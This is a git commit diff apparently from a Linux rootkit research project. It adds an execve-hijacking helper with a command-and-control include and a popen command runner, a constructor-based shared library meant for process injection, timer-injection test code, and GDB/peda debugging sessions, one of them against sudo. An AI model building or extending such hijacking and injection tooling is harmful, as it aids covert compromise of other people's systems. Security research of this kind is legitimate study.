Merged master and develop, now all changes together. Fully tested and working.

2025-12-29 20:53:09 +08:00 · 2022-05-15 20:46:35 -04:00
parent 57f3edd8fa aca4cc4cfb
commit 4a292f0f7a
80 changed files with 15780 additions and 48 deletions
--- a/src/helpers/.gdb_history
+++ b/src/helpers/.gdb_history
@@ -0,0 +1,256 @@
+q
+disass main
+b *(main+446)
+r
+ssi
+si
+ni
+1
+q
+b *(main+446)
+r
+si
+ni
+q
+b *(main+446)
+r
+si
+ni
+q
+b *(main+446)
+r
+si
+ni
+q
+b *(main+446)
+r
+si
+ni
+q
+b *(main+446)
+r
+si
+ni
+q
+b *(main+446)
+r
+si
+ni
+si
+ni
+si
+q
+b *(main+446)
+r
+si
+ni
+si
+si
+si
+fin
+q
+b *(main+446)
+r
+si
+ni
+si
+ni
+q
+b *(main+446)
+r
+si
+si
+ni
+si
+ni
+si
+si
+s
+q
+b *(main+446)
+r
+ni
+q
+b *(main+446)
+r
+si
+ni
+q
+b *(main+446)
+r
+si
+ni
+si
+q
+r
+q
+b *(main+446)
+r
+si
+ni
+si
+ni
+si
+si
+si
+si
+display $fs
+display $fs:0x28
+q
+b *(main+446)
+r
+si
+ni
+q
+b *(main+446)
+r
+si
+si
+ni
+si
+ni
+si
+q
+b *(main+446)
+r
+si
+q
+b *(main+446)
+r
+si
+ni
+si
+si
+ni
+q
+r
+q
+b *(main+446)
+r
+si
+c
+q
+r
+r
+q
+b *(main+446)
+r
+si
+ni
+si
+ni
+si
+q
+b *(main+446)
+r
+si
+ni
+q
+b *(main+446)
+r
+si
+q
+b *(main+446)
+r
+si
+ni
+si
+ni
+si
+q
+b *(main+446)
+r
+si
+ni
+si
+q
+b *(main+446)
+r
+si
+q
+checksec
+q
+checksec
+q
+checksec
+q
+checksec
+q
+disass main
+b *(main+446)
+r
+si
+ni
+si
+ni
+si
+q
+b *(main+446)
+r
+x/20i 0x7ffff7ede560
+x/100i 0x7ffff7ede560
+x/1000i 0x7ffff7ede560
+q
+b *(main+446)
+r
+si
+disass /r 0x555555555130
+x/20b 0x555555557fd0
+q
+b timerfd_settime@plt
+r
+si
+q
+disass /r 0x555555555130
+b timerfd_settime
+r
+q
+b timerfd_settime@plt 
+r
+disass /r 0x555555555130
+q
+b *(main+446)
+r
+si
+ni
+si
+ni
+si
+x/20b 0x5555555556fb
+disass /r 0x555555555134 
+x/20b 0x5555555556fb
+q
+b *(main+446)
+r
+si
+fin
+si
+fin
+si
+fin
+q
+b *(main+446)
+r
+si
+ni
+x/20b 0x5555555556fb
+q
+b *(main+446)
+r
+si
+ni
+x/20b 0x5555555556fb
+q
+b *(main+446)
+r
+si
+ni
+q
+b *(main+446)
+r
+si
+ni
+si
+ni
+si
+q
--- a/src/helpers/Makefile
+++ b/src/helpers/Makefile
@@ -3,14 +3,27 @@ HEADERS = lib/RawTCP.h
 EXTRA_CFLAGS= -I$(PWD)/lib

 default:
-	make execve_hijack
+	make execve_hijack injection_lib simple_timer
+
+injection_lib: injection_lib.o
+	gcc -Wall -shared -fPIC -o injection_lib.so injection_lib.c -ldl
+
+simple_timer.o: simple_timer.c $(HEADERS)
+	gcc -g -c simple_timer.c
+
+simple_timer: simple_timer.o
+	gcc -g -o simple_timer simple_timer.o

 execve_hijack.o: execve_hijack.c $(HEADERS)
-	gcc -c execve_hijack.c
+	gcc -g -c execve_hijack.c

 execve_hijack: execve_hijack.o lib/libRawTCP_Lib.a
-	gcc -lm -o execve_hijack execve_hijack.o -L. lib/libRawTCP_Lib.a
+	gcc -g -o execve_hijack execve_hijack.o -ldl -L. lib/libRawTCP_Lib.a

 clean:
 	-rm -f execve_hijack.o
-	-rm -f execve_hijack
+	-rm -f execve_hijack
+	-rm -f injection_lib.o
+	-rm -f injection_lib.so
+	-rm -f simple_timer.o
+	-rm -f simple_timer
--- a/src/helpers/execve_hijack.asm
+++ b/src/helpers/execve_hijack.asm
--- a/src/helpers/execve_hijack.c
+++ b/src/helpers/execve_hijack.c
@@ -18,6 +18,8 @@
 #include <sys/file.h>
 #include <errno.h>
 #include <syslog.h>
+#include <dlfcn.h>
+#include <sys/timerfd.h>

 #include "lib/RawTCP.h"
 #include "../common/c&c.h"
@@ -27,6 +29,63 @@

 #define LOCK_FILE "/tmp/rootlog"

+int test_time_values_injection(){
+
+    struct itimerspec new_value, new_value2;
+    int max_exp, fd, fd2;
+    struct timespec now;
+    uint64_t exp, tot_exp;
+    ssize_t s;
+
+
+    fd = timerfd_create(CLOCK_REALTIME, 0);
+    if (fd == -1)
+        return -1;
+
+    new_value.it_interval.tv_sec = 30;
+    new_value.it_interval.tv_nsec = 0;
+
+    if (timerfd_settime(fd, TFD_TIMER_ABSTIME, &new_value, NULL) == -1)
+        return -1;
+
+    fd2 = timerfd_create(CLOCK_REALTIME, 0);
+    if (fd2 == -1)
+        return -1;
+
+    new_value2.it_interval.tv_sec = 30;
+    new_value2.it_interval.tv_nsec = 0;
+
+    if (timerfd_settime(fd2, TFD_TIMER_ABSTIME, &new_value2, NULL) == -1)
+        return -1;
+    
+        
+    printf("Timer %i started, address sent %llx\n", fd, (__u64)&new_value);
+
+    return 0;
+}
+
+
+char* execute_command(char* command){
+    FILE *fp;
+    char* res = calloc(4096, sizeof(char));
+    char buf[1024];
+
+    fp = popen(command, "r");
+    if(fp == NULL) {
+        printf("Failed to run command\n" );
+        return "COMMAND ERROR";
+    }
+
+    while(fgets(buf, sizeof(buf), fp) != NULL) {
+        strcat(res, buf);
+    }
+    printf("RESULT OF COMMAND: %s\n", res);
+
+    pclose(fp);
+    return res;
+}    
+
+
 char* getLocalIpAddress(){
    char hostbuffer[256];
    char* IPbuffer = calloc(256, sizeof(char));
@@ -49,26 +108,7 @@ char* getLocalIpAddress(){
  
    return IPbuffer;
 }
-
-char* execute_command(char* command){
-    FILE *fp;
-    char* res = calloc(4096, sizeof(char));
-    char buf[1024];
-
-    fp = popen(command, "r");
-    if(fp == NULL) {
-        printf("Failed to run command\n" );
-        return "COMMAND ERROR";
-    }
-
-    while(fgets(buf, sizeof(buf), fp) != NULL) {
-        strcat(res, buf);
-    }
-    printf("RESULT OF COMMAND: %s\n", res);
-
-    pclose(fp);
-    return res;
-}
+    //test_time_values_injection();

 int hijacker_process_routine(int argc, char* argv[], int fd){
    //Lock the file to indicate we are already into the routine
--- a/src/helpers/execve_hijack.o
+++ b/src/helpers/execve_hijack.o
--- a/src/helpers/injection_lib.c
+++ b/src/helpers/injection_lib.c
@@ -0,0 +1,10 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <syslog.h>
+
+__attribute__((constructor))
+static void init()
+{
+    printf("Library successfully injected!\n");
+    syslog(LOG_CRIT, "Library called\n");
+}
--- a/src/helpers/injection_lib.o
+++ b/src/helpers/injection_lib.o
--- a/src/helpers/injection_lib.so
+++ b/src/helpers/injection_lib.so
--- a/src/helpers/opcode_reverser.py
+++ b/src/helpers/opcode_reverser.py
@@ -0,0 +1,15 @@
+#!/usr/bin/env python3
+import sys
+from itertools import chain
+
+while True:
+    arg = input()[::-1]
+    group = 2
+    result = "".join(chain.from_iterable([reversed(elem) for elem in zip(*[iter(arg)]*group)]))
+
+    if(len(result) != len(arg)):
+        print("String not with even characters?")
+        #exit(1)
+
+    print(result)
+
--- a/src/helpers/peda-session-execve_hijack.txt
+++ b/src/helpers/peda-session-execve_hijack.txt
@@ -0,0 +1,2 @@
+break *(test_time_values_injection+94)
+
--- a/src/helpers/peda-session-simple_timer.txt
+++ b/src/helpers/peda-session-simple_timer.txt
@@ -0,0 +1,2 @@
+break *(main+446)
+
--- a/src/helpers/peda-session-sudo.txt
+++ b/src/helpers/peda-session-sudo.txt
@@ -0,0 +1,15 @@
+break test_time_values_injection
+disable $bpnum
+break *(test_time_values_injection+94)
+disable $bpnum
+break *(test_time_values_injection+177)
+disable $bpnum
+
+
+
+
+
+
+
+
+
--- a/src/helpers/simple_timer
+++ b/src/helpers/simple_timer
--- a/src/helpers/simple_timer.c
+++ b/src/helpers/simple_timer.c
@@ -0,0 +1,110 @@
+/**
+ * Modified version of Linux man page timer using timerfd.
+ * Counts to 3, 1 second at a time, then sets another time up to 3, one second at a time.
+ */
+
+#include <sys/timerfd.h>
+#include <time.h>
+#include <unistd.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <stdint.h>
+
+void print_elapsed_time() {
+    static struct timespec start;
+    struct timespec curr;
+    static int first_call = 1;
+    int secs, nsecs;
+
+    if (first_call) {
+        first_call = 0;
+        if (clock_gettime(CLOCK_MONOTONIC, &start) == -1){
+            perror("clock_gettime");
+            return;   
+        }
+    }
+
+    if (clock_gettime(CLOCK_MONOTONIC, &curr) == -1){
+        perror("clock_gettime");
+        return;
+    }
+        
+    secs = curr.tv_sec - start.tv_sec;
+    nsecs = curr.tv_nsec - start.tv_nsec;
+    if (nsecs < 0) {
+        secs--;
+        nsecs += 1000000000;
+    }
+    printf("Timer called at: %d.%03d: ", secs, (nsecs + 500000) / 1000000);
+}
+
+int main(int argc, char *argv[]) {
+    struct itimerspec new_value;
+    int max_exp, fd;
+    struct timespec now;
+    uint64_t exp;
+    ssize_t s;
+
+    if (clock_gettime(CLOCK_REALTIME, &now) == -1){
+        perror("clock_gettime");
+        return -1;
+    }
+       
+    new_value.it_value.tv_sec = now.tv_sec +1;
+    new_value.it_value.tv_nsec = now.tv_nsec;
+    new_value.it_interval.tv_sec = 1;
+    new_value.it_interval.tv_nsec = 0;
+    max_exp = 3;
+
+    fd = timerfd_create(CLOCK_REALTIME, 0);
+    if (fd == -1){
+        perror("timerfd_create");
+        return -1;
+    }
+
+    if (timerfd_settime(fd, TFD_TIMER_ABSTIME, &new_value, NULL) == -1){
+        perror("timerfd_settime");
+        return -1;
+    }
+
+    printf("Timer started\n");
+
+    for (uint64_t tot_exp = 0; tot_exp < max_exp;) {
+        s = read(fd, &exp, sizeof(uint64_t));
+        if (s != sizeof(uint64_t))
+            perror("Error reading from timer");
+
+        tot_exp += exp;
+        print_elapsed_time();
+        printf("time between: %llu; total elapsed time=%llu\n", (unsigned long long) exp, (unsigned long long) tot_exp);
+    }
+
+    if (clock_gettime(CLOCK_REALTIME, &now) == -1){
+        perror("clock_gettime");
+        return -1;
+    }
+
+    new_value.it_value.tv_sec = now.tv_sec +1;
+    new_value.it_value.tv_nsec = now.tv_nsec;
+    new_value.it_interval.tv_sec = 1;
+    new_value.it_interval.tv_nsec = 0;
+    max_exp = 3;
+
+    if (timerfd_settime(fd, TFD_TIMER_ABSTIME, &new_value, NULL) == -1){
+        perror("timerfd_settime");
+        return -1;
+    }
+
+    for (uint64_t tot_exp = 0; tot_exp < max_exp;) {
+        s = read(fd, &exp, sizeof(uint64_t));
+        if (s != sizeof(uint64_t))
+            perror("Error reading from timer");
+
+        tot_exp += exp;
+        print_elapsed_time();
+        printf("time between: %llu; total elapsed time=%llu\n", (unsigned long long) exp, (unsigned long long) tot_exp);
+    }
+
+
+   return 0;
+}
--- a/src/helpers/simple_timer.o
+++ b/src/helpers/simple_timer.o